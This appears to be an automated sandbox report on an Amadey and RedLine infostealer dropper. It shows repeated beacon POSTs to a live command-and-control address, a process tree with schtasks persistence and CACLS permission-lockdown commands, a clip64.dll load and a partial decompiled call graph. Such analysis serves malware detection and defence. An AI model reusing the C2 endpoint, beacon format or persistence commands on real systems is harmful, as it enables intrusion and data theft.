                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      95192.168.2.74982062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:22.420697927 CET533OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:22.485869884 CET534INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:22 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      96192.168.2.74982162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:22.668124914 CET534OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:22.732945919 CET535INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:22 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      97192.168.2.74982262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:22.933331966 CET535OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:22.998328924 CET536INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:22 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      98192.168.2.74982362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:23.177068949 CET536OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:23.242027998 CET537INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      99192.168.2.74982462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:23.412568092 CET537OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:23.474493980 CET538INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Click to jump to process

                                                                      Click to jump to process

                                                                      Click to dive into process behavior distribution

                                                                      Click to jump to process

                                                                      Target ID:0
                                                                      Start time:18:34:45
                                                                      Start date:06/02/2023
                                                                      Path:C:\Users\user\Desktop\file.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\Desktop\file.exe
                                                                      Imagebase:0xa30000
                                                                      File size:587776 bytes
                                                                      MD5 hash:3AC20281C213C418608FCEA6D744AE8F
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.249730772.00000000049A9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:low

                                                                      Target ID:1
                                                                      Start time:18:34:45
                                                                      Start date:06/02/2023
                                                                      Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\brJg.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\brJg.exe
                                                                      Imagebase:0xf80000
                                                                      File size:395776 bytes
                                                                      MD5 hash:E61222B4D82A6007A553851456BCC651
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      • Detection: 49%, ReversingLabs
                                                                      Reputation:low

                                                                      Target ID:2
                                                                      Start time:18:34:46
                                                                      Start date:06/02/2023
                                                                      Path:C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\arJf.exe
                                                                      Imagebase:0x400000
                                                                      File size:371712 bytes
                                                                      MD5 hash:01BC3DF99AB67BABCDC1577241E3EE87
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.360346336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000002.360346336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: ditekSHen
                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000002.00000002.363155584.0000000000667000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.362707528.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000002.00000002.362707528.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000003.336400821.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000003.336400821.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      • Detection: 28%, ReversingLabs
                                                                      Reputation:low

                                                                      Target ID:3
                                                                      Start time:18:34:54
                                                                      Start date:06/02/2023
                                                                      Path:C:\Windows\System32\rundll32.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\
                                                                      Imagebase:0x7ff619610000
                                                                      File size:69632 bytes
                                                                      MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Target ID:5
                                                                      Start time:18:35:03
                                                                      Start date:06/02/2023
                                                                      Path:C:\Windows\System32\rundll32.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\
                                                                      Imagebase:0x7ff619610000
                                                                      File size:69632 bytes
                                                                      MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Target ID:13
                                                                      Start time:18:35:41
                                                                      Start date:06/02/2023
                                                                      Path:C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\nika.exe
                                                                      Imagebase:0x140000
                                                                      File size:11264 bytes
                                                                      MD5 hash:7E93BACBBC33E6652E147E7FE07572A0
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      • Detection: 82%, ReversingLabs
                                                                      Reputation:moderate

                                                                      Target ID:14
                                                                      Start time:18:35:53
                                                                      Start date:06/02/2023
                                                                      Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\xriv.exe
                                                                      Imagebase:0x10a0000
                                                                      File size:241664 bytes
                                                                      MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000E.00000000.394346269.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, Author: Joe Security
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      • Detection: 81%, ReversingLabs
                                                                      Reputation:moderate

                                                                      Target ID:15
                                                                      Start time:18:35:53
                                                                      Start date:06/02/2023
                                                                      Path:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe"
                                                                      Imagebase:0x70000
                                                                      File size:241664 bytes
                                                                      MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000F.00000002.774984109.0000000000071000.00000020.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 0000000F.00000002.775467476.0000000001139000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000F.00000000.395382320.0000000000071000.00000020.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 0000000F.00000002.775467476.0000000001189000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, Author: Joe Security
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      • Detection: 81%, ReversingLabs
                                                                      Reputation:moderate

                                                                      Target ID:16
                                                                      Start time:18:35:54
                                                                      Start date:06/02/2023
                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
                                                                      Imagebase:0xf80000
                                                                      File size:185856 bytes
                                                                      MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Target ID:17
                                                                      Start time:18:35:54
                                                                      Start date:06/02/2023
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff6edaf0000
                                                                      File size:625664 bytes
                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      Target ID:18
                                                                      Start time:18:35:54
                                                                      Start date:06/02/2023
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit
                                                                      Imagebase:0xa60000
                                                                      File size:232960 bytes
                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      Target ID:19
                                                                      Start time:18:35:54
                                                                      Start date:06/02/2023
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff6edaf0000
                                                                      File size:625664 bytes
                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      Target ID:20
                                                                      Start time:18:35:54
                                                                      Start date:06/02/2023
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                      Imagebase:0xa60000
                                                                      File size:232960 bytes
                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      Target ID:21
                                                                      Start time:18:35:54
                                                                      Start date:06/02/2023
                                                                      Path:C:\Windows\SysWOW64\cacls.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:CACLS "mnolyk.exe" /P "user:N"
                                                                      Imagebase:0x1280000
                                                                      File size:27648 bytes
                                                                      MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      Target ID:22
                                                                      Start time:18:35:54
                                                                      Start date:06/02/2023
                                                                      Path:C:\Windows\SysWOW64\cacls.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:CACLS "mnolyk.exe" /P "user:R" /E
                                                                      Imagebase:0x1280000
                                                                      File size:27648 bytes
                                                                      MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      Target ID:23
                                                                      Start time:18:35:55
                                                                      Start date:06/02/2023
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                      Imagebase:0xa60000
                                                                      File size:232960 bytes
                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      Target ID:24
                                                                      Start time:18:35:55
                                                                      Start date:06/02/2023
                                                                      Path:C:\Windows\SysWOW64\cacls.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:CACLS "..\4b9a106e76" /P "user:N"
                                                                      Imagebase:0x1280000
                                                                      File size:27648 bytes
                                                                      MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      Target ID:25
                                                                      Start time:18:35:55
                                                                      Start date:06/02/2023
                                                                      Path:C:\Windows\SysWOW64\cacls.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:CACLS "..\4b9a106e76" /P "user:R" /E
                                                                      Imagebase:0x1280000
                                                                      File size:27648 bytes
                                                                      MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      Target ID:26
                                                                      Start time:18:35:56
                                                                      Start date:06/02/2023
                                                                      Path:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Imagebase:0x70000
                                                                      File size:241664 bytes
                                                                      MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001A.00000000.401919368.0000000000071000.00000020.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001A.00000002.404038192.0000000000071000.00000020.00000001.01000000.0000000B.sdmp, Author: Joe Security

                                                                      Target ID:27
                                                                      Start time:18:35:56
                                                                      Start date:06/02/2023
                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
                                                                      Imagebase:0x990000
                                                                      File size:61952 bytes
                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      Target ID:28
                                                                      Start time:18:36:01
                                                                      Start date:06/02/2023
                                                                      Path:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Imagebase:0x70000
                                                                      File size:241664 bytes
                                                                      MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001C.00000002.412655905.0000000000071000.00000020.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001C.00000000.412434202.0000000000071000.00000020.00000001.01000000.0000000B.sdmp, Author: Joe Security

                                                                      Target ID:31
                                                                      Start time:18:37:00
                                                                      Start date:06/02/2023
                                                                      Path:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Imagebase:0x70000
                                                                      File size:241664 bytes
                                                                      MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001F.00000000.538870814.0000000000071000.00000020.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001F.00000002.539099474.0000000000071000.00000020.00000001.01000000.0000000B.sdmp, Author: Joe Security

                                                                      Target ID:33
                                                                      Start time:18:38:00
                                                                      Start date:06/02/2023
                                                                      Path:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Imagebase:0x70000
                                                                      File size:241664 bytes
                                                                      MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000021.00000002.667787109.0000000000071000.00000020.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000021.00000000.667491618.0000000000071000.00000020.00000001.01000000.0000000B.sdmp, Author: Joe Security

                                                                      Reset < >

                                                                        Execution Graph

                                                                        Execution Coverage:27.2%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:30.9%
                                                                        Total number of Nodes:968
                                                                        Total number of Limit Nodes:43
                                                                        execution_graph 2196 a34ca0 GlobalAlloc 2197 a36a60 2214 a37155 2197->2214 2199 a36a65 2200 a36a76 GetStartupInfoW 2199->2200 2201 a36a93 2200->2201 2202 a36aaf Sleep 2201->2202 2203 a36aa8 2201->2203 2202->2201 2204 a36ac7 _amsg_exit 2203->2204 2206 a36ad1 2203->2206 2204->2206 2205 a36b13 _initterm 2210 a36b2e __IsNonwritableInCurrentImage 2205->2210 2206->2205 2207 a36af4 2206->2207 2206->2210 2208 a36bd6 _ismbblead 2208->2210 2209 a36c1e 2209->2207 2212 a36c27 _cexit 2209->2212 2210->2208 2210->2209 2213 a36bbe exit 2210->2213 2219 a32bfb GetVersion 2210->2219 2212->2207 2213->2210 2215 a3717a 2214->2215 2216 a3717e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 2214->2216 2215->2216 2217 a371e2 2215->2217 2218 a371cd 2216->2218 2217->2199 2218->2217 2220 a32c50 2219->2220 2221 a32c0f 2219->2221 2236 a32caa memset memset memset 2220->2236 2221->2220 2222 a32c13 GetModuleHandleW 2221->2222 2222->2220 2225 a32c22 GetProcAddress 2222->2225 2225->2220 2233 a32c34 2225->2233 2226 a32c8e 2228 a32c97 CloseHandle 2226->2228 2229 a32c9e 2226->2229 2228->2229 2229->2210 2233->2220 2234 a32c89 2331 a31f90 2234->2331 2348 a3468f FindResourceA SizeofResource 2236->2348 2238 a32e30 2242 a344b9 20 API calls 2238->2242 2240 a32d2d CreateEventA SetEvent 2241 a3468f 7 API calls 2240->2241 2243 a32d57 2241->2243 2244 a32f06 2242->2244 2245 a32d5b 2243->2245 2246 a32d7d 2243->2246 2353 a36ce0 2244->2353 2358 a344b9 2245->2358 2248 a32e1f 2246->2248 2252 a3468f 7 API calls 2246->2252 2387 a35c9e 2248->2387 2250 a32d6e 2250->2244 2255 a32d9f 2252->2255 2253 a32c62 2253->2226 2277 a32f1d 2253->2277 2255->2245 2257 a32da3 CreateMutexA 2255->2257 2256 a32e3a 2258 a32e43 2256->2258 2259 a32e52 FindResourceA 2256->2259 2257->2248 2260 a32dbd GetLastError 2257->2260 2413 a32390 2258->2413 2261 a32e64 LoadResource 2259->2261 2262 a32e6e 2259->2262 2260->2248 2264 a32dca 2260->2264 2261->2262 2262->2250 2428 a336ee GetVersionExA 2262->2428 2265 a32dd5 2264->2265 2266 a32dea 2264->2266 2267 a344b9 20 API calls 2265->2267 2268 a344b9 20 API calls 2266->2268 2269 a32de8 2267->2269 2270 a32dff 2268->2270 2272 a32e04 CloseHandle 2269->2272 2270->2248 2270->2272 2272->2244 2278 a32f3f 2277->2278 2279 a32f6c 2277->2279 2280 a32f5f 2278->2280 2552 a351e5 2278->2552 2572 a35164 2279->2572 2705 a33a3f 2280->2705 2284 a32f71 2287 a33041 2284->2287 2587 a355a0 2284->2587 2290 a36ce0 4 API calls 2287->2290 2292 a32c6b 2290->2292 2291 a32f86 GetSystemDirectoryA 2293 a3658a CharPrevA 2291->2293 2318 a352b6 2292->2318 2294 a32fab LoadLibraryA 2293->2294 2295 a32fc0 GetProcAddress 2294->2295 2296 a32ff7 FreeLibrary 2294->2296 2295->2296 2297 a32fd6 DecryptFileA 2295->2297 2298 a33017 SetCurrentDirectoryA 2296->2298 2299 a33006 2296->2299 2297->2296 2307 a32ff0 2297->2307 2300 a33026 2298->2300 2301 a33054 2298->2301 2299->2298 2637 a3621e GetWindowsDirectoryA 2299->2637 2302 a344b9 20 API calls 2300->2302 2304 a33061 2301->2304 2648 a33b26 2301->2648 2306 a33037 2302->2306 2304->2287 2309 